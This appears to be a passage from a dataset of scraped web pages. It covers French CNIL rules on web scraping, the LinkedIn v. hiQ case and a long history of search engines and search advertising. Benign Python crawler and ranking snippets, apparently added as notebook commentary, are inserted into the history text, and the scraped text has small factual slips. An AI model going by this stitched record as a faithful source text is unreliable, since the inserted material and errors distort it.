you are looking to perform web scraping. However, you do need to perform one if there is a high risk to data subjects. 
There are two scenarios when you would need to complete one of these assessments. The first case is if the processing envisaged is on the list of types of processing operations for which the CNIL considers an assessment to be compulsory. The second case in which you would need to perform an assessment is if it meets two out of the nine criteria laid out in the G29 guidelines. There are several pros and cons to conducting a data protection impact assessment. For starters, it will take more time for companies to get approval and this could cost them. However, this extra time gives users more protection over their data. It also ensures that companies take the time to evaluate how they will handle and protect the data. Another con, however, is that some useful data collection may not take place if their data protection impact assessment is not accepted. If more companies have to perform these types of assessments, there might be fewer companies that do data collection and, thus, leave data in the hands of only a few companies. There are several key steps that you can perform when carrying out a data protection impact assessment. The first step is identifying the need for a DPIA. If you do need to perform a DPIA, start by describing the process and then lay out how and why you plan to use the data you have collected. This should include the nature, scope, context, and purposes of the processing. The third step is to consider a consultation. Next, assess the necessity and proportionality of the data collection. You also need to identify and assess any of the risks that may come up. After you have identified any risks, you must find ways to mitigate those risks. Finally, you need to record several different items such as any other measures you will take in regard to data collection and protecting that data. You also need to identify whether the risks have been eliminated, reduced, or accepted, and the overall level of residual risk. Finally, you need to record if you need to consult the ICO. What Do the New CNIL Guidelines Mean for Web Scraping Services? The new CNIL guidelines have impacted web scraping due to the way they limit whom you are able to collect data from. For example, you are no longer allowed to collect data from people who have determined that they do not want their data collected, even if that data is publicly available. The new guidelines state that the data should also be relevant and only collected from websites that allow data collection. This means that companies which offer web scraping services are no longer allowed to collect irrelevant, excessive, or sensitive data. You Can Still Perform Legal Web Scraping. Here’s How: The CNIL did issue some guidance on collecting data. For starters, the companies need to have an understanding of how long the data processing or web scraping will last. Companies also need to know where the scraped data came from, especially if that company restricts its data from being collected for commercial reuse. Companies also need to limit the amount of data to only the necessary data for the identified task and not collect any data which is irrelevant to that task. Individuals also have to be informed if they are affected by the collection of their personal data. On top of this, the CNIL wants companies to carefully oversee all of their vendor relationships in regard to data processing. It is recommended that companies comply with all GDPR requirements. 
Finally, companies may need to do a data protection impact assessment, depending on the type of data they collect and the methods they use to collect it. The LinkedIn vs. HiQ Case and What it Means for You LinkedIn is a popular website that allows employees to connect with workers and companies, helping them grow the number of business relationships they have. HiQ is a data scraping company that collects publicly available data from LinkedIn. There was an increase in the number of companies that were scraping data from LinkedIn and this resulted in a ban on those companies. However, HiQ was able to get around that ban by hiding the IP address that was being used for the web scraping. LinkedIn then sent a cease-and-desist letter to HiQ because they had breached LinkedIn’s ToS and violated the Computer Fraud and Abuse Act. HiQ filed for a preliminary injunction so that it could still function until a later date. The case made its way to the Ninth Circuit, where the preliminary injunction was upheld, allowing HiQ to collect the data that it wanted. This could potentially impact web scraping services because it could allow them to collect publicly available data from the website, even if doing so breaches that company’s ToS. However, this case is not completely over and LinkedIn may have this case appealed to the Supreme Court. Summing It All Up The world of web scraping is changing as more people and countries push to protect their data. One of those countries trying to protect their citizens’ data is France, which has passed new guidelines on the collection of data. The CNIL decided that publicly available data still fell under the umbrella of the GDPR and established several guidelines on web scraping technologies. The CNIL also laid down regulations on how companies should handle data protection impact assessments. These assessments have the potential to protect people’s data better and make sure that data collection companies are also following the rules. However, while these new guidelines do not stop a company from collecting data from individuals, they do allow individuals to opt out of having their data collected and limit the amount of data that can be collected. While these new guidelines appear to limit web scraping, a Ninth Circuit Court ruling in the United States seemed to rule in favor of web scraping continuing even when it breaks a company’s ToS. Looking for more information? Check out the legal web scraping guide. |
604 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit&section=21 | (Scraped page was a MediaWiki edit-permission error page, an IP range block notice, with no article content.) |
605 | https://en.wikipedia.org/wiki/Web_scraping | http://www.searchenginehistory.com/ | The concept of hypertext and a memory extension really came to life in July of 1945, when after enjoying the scientific camaraderie that was a side effect of WWII, Vannevar Bush's As We May Think was published in The Atlantic Monthly. He urged scientists to work together to help build a body of knowledge for all mankind. Here are a few selected sentences and paragraphs that drive his point home. Specialization becomes increasingly necessary for progress, and the effort to bridge between disciplines is correspondingly superficial. The difficulty seems to be, not so much that we publish unduly in view of the extent and variety of present day interests, but rather that publication has been extended far beyond our present ability to make real use of the record. The summation of human experience is being expanded at a prodigious rate, and the means we use for threading through the consequent maze to the momentarily important item is the same as was used in the days of square-rigged ships. A record, if it is to be useful to science, must be continuously extended, it must be stored, and above all it must be consulted. He not only was a firm believer in storing data, but he also believed that if the data source was to be useful to the human mind we should have it represent how the mind works to the best of our abilities. Our ineptitude in getting at the record is largely caused by the artificiality of the systems of indexing. ... Having found one item, moreover, one has to emerge from the system and re-enter on a new path. The human mind does not work this way. It operates by association. ... Man cannot hope fully to duplicate this mental process artificially, but he certainly ought to be able to learn from it. In minor ways he may even improve, for his records have relative permanency. Presumably man's spirit should be elevated if he can better review his own shady past and analyze more completely and objectively his present problems. He has built a civilization so complex that he needs to mechanize his records more fully if he is to push his experiment to its logical conclusion and not merely become bogged down part way there by overtaxing his limited memory. He then proposed the idea of a virtually limitless, fast, reliable, extensible, associative memory storage and retrieval system. He named this device a memex. Gerard Salton, who died on August 28th of 1995, was the father of modern search technology. His teams at Harvard and Cornell developed the SMART informational retrieval system. Salton’s Magic Automatic Retriever of Text included important concepts like the vector space model, Inverse Document Frequency (IDF), Term Frequency (TF), term discrimination values, and relevancy feedback mechanisms. He authored a 56 page book called A Theory of Indexing which does a great job explaining many of his tests upon which search is still largely based. Tom Evslin posted a blog entry about what it was like to work with Mr. Salton. Ted Nelson created Project Xanadu in 1960 and coined the term hypertext in 1963. His goal with Project Xanadu was to create a computer network with a simple user interface that solved many social problems like attribution. While Ted was against complex markup code, broken links, and many other problems associated with traditional HTML on the WWW, much of the inspiration to create the WWW was drawn from Ted's work. 
There is still conflict surrounding the exact reasons why Project Xanadu failed to take off. The Wikipedia offers background and many resource links about Mr. Nelson. ARPANet is the network which eventually led to the internet. The Wikipedia has a great background article on ARPANet and Google Video has a free interesting video about ARPANet from 1972. The first few hundred web sites began in 1993 and most of them were at colleges, but long before most of them existed came Archie. The first search engine created was Archie, created in 1990 by Alan Emtage, a student at McGill University in Montreal. The original intent of the name was "archives, but it was shortened to Archie. Archie helped solve this data scatter problem by combining a script-based data gatherer with a regular expression matcher for retrieving file names matching a user query. Essentially Archie became a database of web filenames which it would match with the users queries. Bill Slawski has more background on Archie here. As word of mouth about Archie spread, it started to become word of computer and Archie had such popularity that the University of Nevada System Computing Services group developed Veronica. Veronica served the same purpose as Archie, but it worked on plain text files. Soon another user interface name Jughead appeared with the same purpose as Veronica, both of these were used for files sent via Gopher, which was created as an Archie alternative by Mark McCahill at the University of Minnesota in 1991. Tim Burners-Lee existed at this point, however there was no World Wide Web. The main way people shared data back then was via File Transfer Protocol (FTP). If you had a file you wanted to share you would set up an FTP server. If someone was interested in retrieving the data they could using an FTP client. This process worked effectively in small groups, but the data became as much fragmented as it was collected. From the Wikipedia: While an independent contractor at CERN from June to December 1980, Berners-Lee proposed a project based on the concept of hypertext, to facilitate sharing and updating information among researchers. With help from Robert Cailliau he built a prototype system named Enquire. After leaving CERN in 1980 to work at John Poole's Image Computer Systems Ltd., he returned in 1984 as a fellow. In 1989, CERN was the largest Internet node in Europe, and Berners-Lee saw an opportunity to join hypertext with the Internet. In his words, "I just had to take the hypertext idea and connect it to the TCP and DNS ideas and — ta-da — the World Wide Web". He used similar ideas to those underlying the Enquire system to create the World Wide Web, for which he designed and built the first web browser and editor (called WorldWideWeb and developed on NeXTSTEP) and the first Web server called httpd (short for HyperText Transfer Protocol daemon). The first Web site built was at http: info.cern.ch and was first put online on August 6, 1991. It provided an explanation about what the World Wide Web was, how one could own a browser and how to set up a Web server. It was also the world's first Web directory, since Berners-Lee maintained a list of other Web sites apart from his own. In 1994, Berners-Lee founded the World Wide Web Consortium (W3C) at the Massachusetts Institute of Technology. Tim also created the Virtual Library, which is the oldest catalogue of the web. Tim also wrote a book about creating the web, titled Weaving the Web. 
Computer robots are simply programs that automate repetitive tasks at speeds impossible for humans to reproduce. The term bot on the internet is usually used to describe anything that interfaces with the user or that collects data. Search engines use "spiders" which search (or spider) the web for information. They are software programs which request pages much like regular browsers do. In addition to reading the contents of pages for indexing spiders also record links. Another bot example could be Chatterbots, which are resource heavy on a specific topic. These bots attempt to act like a human and communicate with humans on said topic. Search engines consist of 3 main parts. Search engine spiders follow links on the web to request pages that are either not yet indexed or have been updated since they were last indexed. These pages are crawled and are added to the search engine index (also known as the catalog). When you search using a major search engine you are not actually searching the web, but are searching a slightly outdated index of content which roughly represents the content of the web. The third part of a search engine is the search interface and relevancy software. For each search query search engines typically do most or all of the following Searchers generally tend to click mostly on the top few search results, as noted in this article by Jakob Nielsen, and backed up by this search result eye tracking study. Andrei Broder authored A Taxonomy of Web Search PDF , which notes that most searches fall into the following 3 categories: Want to become a better searcher? Most large scale search engines offer: Nancy Blachman's Google Guide offers searchers free Google search tips, and Greg R.Notess's Search Engine Showdown offers a search engine features chart. There are also many popular smaller vertical search services. For example, Del.icio.us allows you to search URLs that users have bookmarked, and Technorati allows you to search blogs. Soon the web's first robot came. In June 1993 Matthew Gray introduced the World Wide Web Wanderer. He initially wanted to measure the growth of the web and created this bot to count active web servers. He soon upgraded the bot to capture actual URL's. His database became knows as the Wandex. The Wanderer was as much of a problem as it was a solution because it caused system lag by accessing the same page hundreds of times a day. It did not take long for him to fix this software, but people started to question the value of bots. In October of 1993 Martijn Koster created Archie-Like Indexing of the Web, or ALIWEB in response to the Wanderer. ALIWEB crawled meta information and allowed users to submit their pages they wanted indexed with their own page description. This meant it needed no bot to collect data and was not using excessive bandwidth. The downside of ALIWEB is that many people did not know how to submit their site. Martijn Kojer also hosts the web robots page, which created standards for how search engines should index or not index content. This allows webmasters to block bots from their site on a whole site level or page by page basis. By default, if information is on a public web server, and people link to it search engines generally will index it. In 2005 Google led a crusade against blog comment spam, creating a nofollow attribute that can be applied at the individual link level. 
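The spider behavior described above, requesting a page much like a browser, reading its contents for the index, recording its links, and honoring the robots exclusion standard and nofollow hints, can be sketched with the same requests/BeautifulSoup stack used earlier in this notebook. The user-agent string, single-page depth, and example URL are arbitrary illustrative choices.
import urllib.robotparser
from urllib.parse import urljoin
import requests
from bs4 import BeautifulSoup

def crawl_page(url, user_agent="toy-spider"):
    # Honor the robots exclusion standard before fetching the page
    robots = urllib.robotparser.RobotFileParser()
    robots.set_url(urljoin(url, "/robots.txt"))
    robots.read()
    if not robots.can_fetch(user_agent, url):
        return None, []

    # Request the page much like a regular browser would
    html = requests.get(url, headers={"User-Agent": user_agent}, timeout=10).text
    soup = BeautifulSoup(html, "html5lib")

    # Record outgoing links, skipping any marked rel="nofollow"
    links = [urljoin(url, a["href"]) for a in soup.find_all("a", href=True)
             if "nofollow" not in (a.get("rel") or [])]
    text = soup.get_text(" ", strip=True)   # page contents that would go into the index
    return text, links

# Example: page_text, page_links = crawl_page("https://example.com/")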
After this was pushed through Google quickly changed the scope of the purpose of the link nofollow to claim it was for any link that was sold or not under editorial control. By December of 1993, three full fledged bot fed search engines had surfaced on the web: JumpStation, the World Wide Web Worm, and the Repository-Based Software Engineering (RBSE) spider. JumpStation gathered info about the title and header from Web pages and retrieved these using a simple linear search. As the web grew, JumpStation slowed to a stop. The WWW Worm indexed titles and URL's. The problem with JumpStation and the World Wide Web Worm is that they listed results in the order that they found them, and provided no discrimination. The RSBE spider did implement a ranking system. Since early search algorithms did not do adequate link analysis or cache full page content if you did not know the exact name of what you were looking for it was extremely hard to find it. Excite came from the project Architext, which was started by in February, 1993 by six Stanford undergrad students. They had the idea of using statistical analysis of word relationships to make searching more efficient. They were soon funded, and in mid 1993 they released copies of their search software for use on web sites. Excite was bought by a broadband provider named Home in January, 1999 for $6.5 billion, and was named Excite Home. In October, 2001 Excite Home filed for bankruptcy. InfoSpace bought Excite from bankruptcy court for $10 million. When Tim Berners-Lee set up the web he created the Virtual Library, which became a loose confederation of topical experts maintaining relevant topical link lists. O'Reilly Media began the GNN project in May 1993 officially launched it in August 1993. It provided an online directory based upon the Whole Internet User's Guide and Catalog it was also the first web site to contain clickable advertisements. Their first advertiser was a law firm named Heller, Ehrman, White and McAuliffe. GNN was acquired by AOL in 1995 shuttered in 1996. The EINet Galaxy web directory was born in January of 1994. It was organized similar to how web directories are today. The biggest reason the EINet Galaxy became a success was that it also contained Gopher and Telnet search features in addition to its web search feature. The web size in early 1994 did not really require a web directory; however, other directories soon did follow. In April 1994 David Filo and Jerry Yang created the Yahoo Directory as a collection of their favorite web pages. As their number of links grew they had to reorganize and become a searchable directory. What set the directories above The Wanderer is that they provided a human compiled description with each URL. As time passed and the Yahoo Directory grew Yahoo began charging commercial sites for inclusion. As time passed the inclusion rates for listing a commercial site increased. The current cost is $299 per year. Many informational sites are still added to the Yahoo Directory for free. On September 26, 2014, Yahoo announced they would close the Yahoo Directory at the end of 2014, though it was transitioned to being part of Yahoo Small Business and remained online at business.yahoo.com. In 1998 Rich Skrenta and a small group of friends created the Open Directory Project, which is a directory which anybody can download and use in whole or part. The ODP (also known as DMOZ) is the largest internet directory, almost entirely ran by a group of volunteer editors. 
The Open Directory Project was grown out of frustration webmasters faced waiting to be included in the Yahoo Directory. Netscape bought the Open Directory Project in November, 1998. Later that same month AOL announced the intention of buying Netscape in a $4.5 billion all stock deal. DMOZ closed on March 17, 2017. When the directory shut down it had 3,861,210 active listings in 90 languages. Numerous online mirrors of the directory have been published at DMOZtools.net, ODP.org other locations. Google offers a librarian newsletter to help librarians and other web editors help make information more accessible and categorize the web. The second Google librarian newsletter came from Karen G. Schneider, who was the director of Librarians' Internet Index. LII was a high quality directory aimed at librarians. Her article explains what she and her staff look for when looking for quality credible resources to add to the LII. Most other directories, especially those which have a paid inclusion option, hold lower standards than selected limited catalogs created by librarians. The LII was later merged into the Internet Public Library, which was another well kept directory of websites that went into archive-only mode after 20 years of service. Due to the time intensive nature of running a directory, and the general lack of scalability of a business model the quality and size of directories sharply drops off after you get past the first half dozen or so general directories. There are also numerous smaller industry, vertically, or locally oriented directories. Business.com, for example, is a directory of business websites. Business.com was a high-profile purchase for local directory company R.H. Donnelley. Unfortunately that $345 milion deal on July 26, 2007 only accelerated the bankruptcy of R.H. Donnelley, which let them to sell the Business.com directory to Resource Nation in February of 2011. The Google Panda algorithm hit Business.com, which made it virtually impossible for the site to maintain a strong cashflow based on organic search rankings. Business.com was once again sold in June of 2016 to the Purch Group. Looksmart was founded in 1995. They competed with the Yahoo Directory by frequently increasing their inclusion rates back and forth. In 2002 Looksmart transitioned into a pay per click provider, which charged listed sites a flat fee per click. That caused the demise of any good faith or loyalty they had built up, although it allowed them to profit by syndicating those paid listings to some major portals like MSN. The problem was that Looksmart became too dependant on MSN, and in 2003, when Microsoft announced they were dumping Looksmart that basically killed their business model. In March of 2002, Looksmart bought a search engine by the name of WiseNut, but it never gained traction. Looksmart also owns a catalog of content articles organized in vertical sites, but due to limited relevancy Looksmart has lost most (if not all) of their momentum. In 1998 Looksmart tried to expand their directory by buying the non commercial Zeal directory for $20 million, but on March 28, 2006 Looksmart shut down the Zeal directory, and hope to drive traffic using Furl, a social bookmarking program. All major search engines have some limited editorial review process, but the bulk of relevancy at major search engines is driven by automated search algorithms which harness the power of the link graph on the web. 
In fact, some algorithms, such as TrustRank, bias the web graph toward trusted seed sites without requiring a search engine to take on much of an editorial review staff. Thus, some of the more elegant search engines allow those who link to other sites to in essence vote with their links as the editorial reviewers. Unlike highly automated search engines, directories are manually compiled taxonomies of websites. Directories are far more cost and time intensive to maintain due to their lack of scalability and the necessary human input to create each listing and periodically check the quality of the listed websites. General directories are largely giving way to expert vertical directories, temporal news sites (like blogs), and social bookmarking sites (like del.icio.us). In addition, each of those three publishing formats I just mentioned also aids in improving the relevancy of major search engines, which further cuts at the need for (and profitability of) general directories. Here is a great background video on the history of search. Brian Pinkerton of the University of Washington released WebCrawler on April 20, 1994. It was the first crawler which indexed entire pages. Soon it became so popular that during daytime hours it could not be used. AOL eventually purchased WebCrawler and ran it on their network. Then in 1997, Excite bought out WebCrawler, and AOL began using Excite to power its NetFind. WebCrawler opened the door for many other services to follow suit. Within 1 year of its debut came Lycos, Infoseek, and OpenText. Lycos was the next major search development, having been designed at Carnegie Mellon University around July of 1994. Michael Mauldin was responsible for this search engine and remained the chief scientist at Lycos Inc. On July 20, 1994, Lycos went public with a catalog of 54,000 documents. In addition to providing ranked relevance retrieval, Lycos provided prefix matching and word proximity bonuses. But Lycos' main difference was the sheer size of its catalog: by August 1994, Lycos had identified 394,000 documents; by January 1995, the catalog had reached 1.5 million documents; and by November 1996, Lycos had indexed over 60 million documents, more than any other Web search engine. In October 1994, Lycos ranked first on Netscape's list of search engines by finding the most hits on the word surf. Infoseek also started out in 1994, claiming to have been founded in January. They really did not bring a whole lot of innovation to the table, but they offered a few add-ons, and in December 1995 they convinced Netscape to use them as their default search, which gave them major exposure. One popular feature of Infoseek was allowing webmasters to submit a page to the search index in real time, which was a search spammer's paradise. AltaVista's online debut came during this same month. AltaVista brought many important features to the web scene. They had nearly unlimited bandwidth (for that time), they were the first to allow natural language queries and advanced searching techniques, and they allowed users to add or delete their own URL within 24 hours. They even allowed inbound link checking. AltaVista also provided numerous search tips and advanced search features. Due to poor management, a fear of result manipulation, and portal related clutter, AltaVista was largely driven into irrelevancy around the time Inktomi and Google started becoming popular. On February 18, 2003, Overture signed a letter of intent to buy AltaVista for $80 million in stock and $60 million cash.
After Yahoo bought out Overture they rolled some of the AltaVista technology into Yahoo Search, and occasionally use AltaVista as a testing platform. The Inktomi Corporation came about on May 20, 1996 with its search engine Hotbot. Two Cal Berkeley cohorts created Inktomi from the improved technology gained from their research. Hotwire listed this site and it became hugely popular quickly. In October of 2001 Danny Sullivan wrote an article titled Inktomi Spam Database Left Open To Public, which highlights how Inktomi accidentally allowed the public to access their database of spam sites, which listed over 1 million URLs at that time. Although Inktomi pioneered the paid inclusion model it was nowhere near as efficient as the pay per click auction model developed by Overture. Licensing their search results also was not profitable enough to pay for their scaling costs. They failed to develop a profitable business model, and sold out to Yahoo for approximately $235 million, or $1.65 a share, in December of 2003. In April of 1997 Ask Jeeves was launched as a natural language search engine. Ask Jeeves used human editors to try to match search queries. Ask was powered by DirectHit for a while, which aimed to rank results based on their popularity, but that technology proved to easy to spam as the core algorithm component. In 2000 the Teoma search engine was released, which uses clustering to organize sites by Subject Specific Popularity, which is another way of saying they tried to find local web communities. In 2001 Ask Jeeves bought Teoma to replace the DirectHit search technology. Jon Kleinberg's Authoritative sources in a hyperlinked environment PDF was a source of inspiration what lead to the eventual creation of Teoma. Mike Grehan's Topic Distillation PDF also explains how subject specific popularity works. On Mar 4, 2004, Ask Jeeves agreed to acquire Interactive Search Holdings for 9.3 million shares of common stock and options and pay $150 million in cash. On March 21, 2005 Barry Diller's IAC agreed to acquire Ask Jeeves for 1.85 billion dollars. IAC owns many popular websites like Match.com, Ticketmaster.com, and Citysearch.com, and is promoting Ask across their other properties. In 2006 Ask Jeeves was renamed to Ask, and they killed the separate Teoma brand. AllTheWeb was a search technology platform launched in May of 1999 to showcase Fast's search technologies. They had a sleek user interface with rich advanced search features, but on February 23, 2003, AllTheWeb was bought by Overture for $70 million. After Yahoo bought out Overture they rolled some of the AllTheWeb technology into Yahoo Search, and occasionally use AllTheWeb as a testing platform. Most meta search engines draw their search results from multiple other search engines, then combine and rerank those results. This was a useful feature back when search engines were less savvy at crawling the web and each engine had a significantly unique index. As search has improved the need for meta search engines has been reduced. Hotbot was owned by Wired, had funky colors, fast results, and a cool name that sounded geeky, but died off not long after Lycos bought it and ignored it. Upon rebirth it was born as a meta search engine. Unlike most meta search engines, Hotbot only pulls results from one search engine at a time, but it allows searchers to select amongst a few of the more popular search engines on the web. 
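The combine-and-rerank step described above can be illustrated with a generic rank fusion sketch. This is not how Dogpile, Hotbot, or any specific meta search engine actually scores results; it is a simple reciprocal rank fusion over hypothetical ranked URL lists, with the constant k=60 being a commonly cited default rather than anything from this document:

def fuse_results(result_lists, k=60):
    # Reciprocal rank fusion: each engine contributes 1/(k + rank) per URL,
    # so URLs that rank well across several engines float to the top.
    scores = {}
    for results in result_lists:
        for rank, url in enumerate(results, start=1):
            scores[url] = scores.get(url, 0.0) + 1.0 / (k + rank)
    return sorted(scores, key=scores.get, reverse=True)

# engine_a = ["https://a.example", "https://b.example", "https://c.example"]
# engine_b = ["https://b.example", "https://a.example", "https://d.example"]
# fuse_results([engine_a, engine_b])  # a and b lead because both engines returned them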
Currently Dogpile, owned by Infospace, is probably the most popular meta search engine on the market, but like all other meta search engines, it has limited market share. One of the larger problems with meta search in general is that most meta search engines tend to mix pay per click ads in their organic search results, and for some commercial queries 70% or more of the search results may be paid results. I also created Myriad Search, which is a free open source meta search engine without ads. The major search engines are fighting for content and marketshare in verticals outside of the core algorithmic search product. For example, both Yahoo and MSN have question answering services where humans answer each other's questions for free. Google has a similar offering, but question answerers are paid for their work. Google, Yahoo, and MSN are also fighting to become the default video platform on the web, which is a vertical where an upstart named YouTube also has a strong position. Yahoo and Microsoft are aligned on book search in a group called the Open Content Alliance. Google, going it alone in that vertical, offers a proprietary Google Book search. All three major search engines provide a news search service. Yahoo has partnered with some premium providers to allow subscribers to include that content in their news search results. Google has partnered with the AP and a number of other news sources to extend their news database back over 200 years. And Topix.net is a popular news service which sold 75% of its ownership to 3 of the largest newspaper companies. Thousands of weblogs are updated daily reporting the news, some of which are competing with (and beating out) the mainstream media. If that were not enough options for news, social bookmarking sites like Del.icio.us frequently update recently popular lists, there are meme trackers like Techmeme that track the spread of stories through blogs, and sites like Digg allow their users to directly vote on how much exposure each item gets. Google also has a Scholar search program which aims to make scholarly research easier to do. In some verticals, like shopping search, other third party players may have significant marketshare, gained through offline distribution and branding (for example, yellow pages companies), or gained largely through arbitraging traffic streams from the major search engines. On November 15, 2005 Google launched a product called Google Base, which is a database of just about anything imaginable. Users can upload items and title, describe, and tag them as they see fit. Based on usage statistics this tool can help Google understand which vertical search products they should create or place more emphasis on. They believe that owning other verticals will allow them to drive more traffic back to their core search service. They also believe that targeted measured advertising associated with search can be carried over to other mediums. For example, Google bought dMarc, a radio ad placement firm. Yahoo has also tried to extend their reach by buying other high traffic properties, like the photo sharing site Flickr, and the social bookmarking site del.icio.us. After a couple years of testing, on May 5th, 2010 Google unveiled a 3 column search result layout which highlights many vertical search options in the left rail. Google shut down their financial services comparison search tool Google Comparison on March 23, 2016. 
Google has continued to grow their Product Listing Ads, local inventory ads, and hotel ads while shedding many other vertical search functions. When Google shut down their financial comparison search tool they shifted from showing a maximum of 3 ads at the top of the search results to showing a maximum of 4 ads above the organic search results. By 2015 mobile accounted for more than half of digital ad spending. The online ad market is growing increasingly consolidated, with Google and Facebook eating almost all of the growth. Google's dominance over desktop search is even greater on mobile, as Google pays Apple to be the default search provider in iOS, and Android's secret contracts bundled Google as the default search option. Google settled an Android antitrust case in Russia and is being investigated in Europe. Due to the increasing importance of mobile, Google shifted to showing search results in a single column on desktop computers, with the exception of sometimes showing knowledge graph cards or graphic Product Listing Ads in the right column of the desktop search results. Ad blocking has become widespread on both mobile devices and desktop computers. However, Google pays AdBlock Plus to allow ads to show on Google.com, and Facebook can bypass ad blocking with inline ads in their mobile application. Most other publishers have had much less luck in dealing with the rise of ad blockers. As publishers have been starved for revenues, some publishers like Tronc have sacrificed user experience by embedding thousands of auto-playing videos in their articles. This in turn only accelerates the demand for ad blockers. Facebook and Google have been in a fight to increase their time on site on mobile devices. Facebook introduced Instant Articles, which ports publisher articles into Facebook; however, publishers struggled to monetize the exposure. Google launched a competing solution called Accelerated Mobile Pages (AMP), and publishers also struggled to monetize that audience. An additional factor which has stripped audience from publisher websites is the increasing number of featured snippets, knowledge graph results, and interactive tools embedded directly in Google's search results. These features may extract the value of publishers' websites without sending them anything in return. And they have also caused issues when Google's algorithms chose to display factually incorrect answers. Both Google and Facebook are partly to blame for the decline of online publishing. As they defunded web publishers it encouraged more outrageous publishing behaviors. The Internet commoditized the distribution of facts. The "news" media responded by pivoting wholesale into opinions and entertainment. Another contributing factor to the decline of online publishing is how machine learning algorithms measure engagement and fold it back into ranking. People are more likely to share or link to something which confirms their political ideology, while fairly neutral pieces that are not biased may have some analysis in them that almost everyone hates, which means they have a less loyal following and readers are less likely to share their work. That in turn makes the work less likely to be seen on social networks like Facebook or rank high in Google search results. Search engine marketing is marketing via search engines, done through organic search engine optimization, paid search engine advertising, and paid inclusion programs. As mentioned earlier, many general web directories charge a one time flat fee or annually recurring rate for listing commercial sites.
Many shopping search engines charge a flat cost per click rate to be included in their databases. As far as major search engines go, Inktomi popularized the paid inclusion model. They were bought out by Yahoo in December of 2003. After Yahoo dropped Google and rolled out their own search technology they continued to offer a paid inclusion program to list sites in their regular search results, but Yahoo Search Submit was ended at the end of 2009. Pay per click ads allow search engines to sell targeted traffic to advertisers on a cost per click basis. Typically pay per click ads are keyword targeted, but in some cases, some engines may also add in local targeting, behavioral targeting, or allow merchants to bid on traffic streams based on demographics as well. Pay per click ads are typically sold in an auction where the highest bidder ranks #1 for that keyword. Some engines, like Google and Microsoft, also factor ad clickthrough rate into the click cost. Doing so ensures their ads get clicked on more frequently, and that their advertisements are more relevant. A merchant who writes compelling ad copy and gets a high CTR will be allowed to pay less per click to receive traffic. In 1996 an 18-year-old college dropout named Scott Banister came up with the idea of charging search advertisers by the click with ads tied to the search keyword. He promoted it to the likes of Yahoo, but their (lack of) vision was corrupted by easy money, so they couldn't see the potential of search. The person who finally ran with Mr. Banister's idea was IdeaLab's Bill Gross. Overture, the pioneer in paid search, was originally launched by Bill Gross under the name GoTo in 1998. His idea was to arbitrage traffic streams and sell them with a level of accountability. John Battelle's The Search has an entertaining section about Bill Gross and the formation of Overture. John also published that section on his blog. “The more I thought about it, the more I realized that the true value of the Internet was in its accountability,” Gross tells me. “Performance guarantees had to be the model for paying for media.” Gross knew offering virtually risk-free clicks in an overheated and ravenous market ensured GoTo would take off. And while it would be easy to claim that GoTo worked because of the Internet bubble’s ouroboros-like hunger for traffic, the company managed to outlast the bust for one simple reason: it worked. While Overture was wildly successful, it had two major downfalls which prevented them from taking Google's market position. Those two faults meant that Overture was heavily reliant on its two largest distribution partners - Yahoo and Microsoft. Overture bought out AltaVista and AllTheWeb to try to win some leverage, but ultimately they sold out to Yahoo on July 14, 2003 for $1.63 billion. Google AdWords launched in 2000. The initial version was a failure because it priced ads on a flat CPM model. Some keywords were overpriced and unaffordable, while others were sold inefficiently at too cheap a price. In February of 2002, Google relaunched AdWords, selling the ads in an auction similar to Overture's but also adding ad clickthrough rate as a factor in the ad rankings.
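As a rough, toy illustration of the auction mechanics described above (not Google's or Overture's actual pricing formula; the bids, clickthrough rates, increment, and reserve price are all made up), ads can be ordered by bid multiplied by expected CTR, with each advertiser paying just enough to keep its slot:

def rank_ads(ads):
    # Order ads by a toy "ad rank" score: max bid times expected clickthrough rate
    return sorted(ads, key=lambda ad: ad["bid"] * ad["ctr"], reverse=True)

def price_clicks(ranked):
    # Toy generalized second price: pay the minimum needed to outrank the next ad, plus $0.01
    prices = []
    for i, ad in enumerate(ranked):
        if i + 1 < len(ranked):
            nxt = ranked[i + 1]
            prices.append(round(nxt["bid"] * nxt["ctr"] / ad["ctr"] + 0.01, 2))
        else:
            prices.append(0.05)  # assumed reserve price for the last slot
    return prices

# ads = [{"name": "A", "bid": 2.00, "ctr": 0.010},
#        {"name": "B", "bid": 1.00, "ctr": 0.030},
#        {"name": "C", "bid": 1.50, "ctr": 0.015}]
# ranked = rank_ads(ads)  # B outranks A despite bidding half as much, because its ad is clicked 3x as often
# price_clicks(ranked)

This is the sense in which a merchant who writes compelling ad copy and earns a high CTR ends up paying less per click for the same traffic.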
Affiliates and other web entrepreneurs quickly took to AdWords because the precise targeting and great reach made it easy to make great profits from the comfort of your own home, while sitting in your underwear :) Over time, as AdWords became more popular and more mainstream marketers adopted it, Google began closing some holes in their AdWords product. For example, to fight off noise and keep their ads as relevant as possible, they disallowed double serving of ads to one website. Later they started looking at landing page quality and establishing quality based minimum pricing, which squeezed the margins of many small arbitrage and affiliate players. Google intends to take the trackable ad targeting allowed by AdWords and extend it into other mediums. Google has already tested print and newspaper ads. Google allows advertisers to buy graphic or video ads on content websites. On January 17, 2006, Google announced they bought dMarc Broadcasting, which is a company they will use to help Google sell targeted radio ads. On September 15, 2006, Google partnered with Intuit to allow small businesses using QuickBooks to buy AdWords from within QuickBooks. The goal is to help make local ads more relevant by getting more small businesses to use AdWords. On March 20, 2007, Google announced they were beta testing creating a distributed pay per action affiliate ad network. On April 13, 2007 Google announced the purchase of DoubleClick for $3.1 billion. On March 4, 2003 Google announced their content targeted ad network. In April 2003, Google bought Applied Semantics, which had CIRCA technology that allowed them to drastically improve the targeting of those ads. Google adopted the name AdSense for the new ad program. AdSense allows web publishers large and small to automate the placement of relevant ads on their content. Google initially started off by allowing textual ads in numerous formats, but eventually added image ads and video ads. Advertisers could chose which keywords they wanted to target and which ad formats they wanted to market. To help grow the network and make the market more efficient Google added a link which allows advertisers to sign up for AdWords account from content websites, and Google allowed advertisers to buy ads targeted to specific websites, pages, or demographic categories. Ads targeted on websites are sold on a cost per thousand impression (CPM) basis in an ad auction against other keyword targeted and site targeted ads. Google also allows some publishers to place AdSense ads in their feeds, and some select publishers can place ads in emails. To prevent the erosion of value of search ads Google allows advertisers to opt out of placing their ads on content sites, and Google also introduced what they called smart pricing. Smart pricing automatically adjusts the click cost of an ad based on what Google perceives a click from that page to be worth. An ad on a digital camera review page would typically be worth more than a click from a page with pictures on it. Google was secretive about its revenue share since the inception of AdSense, but due to a lawsuit in Italy Google feared they would be stuck disclosing their revenue share, so they decided to do so publicly for good public relations on May 24, 2010. Google keeps 32% while giving publishers 68% of contextual ad revenues. On search ads Google keeps 49% and gives 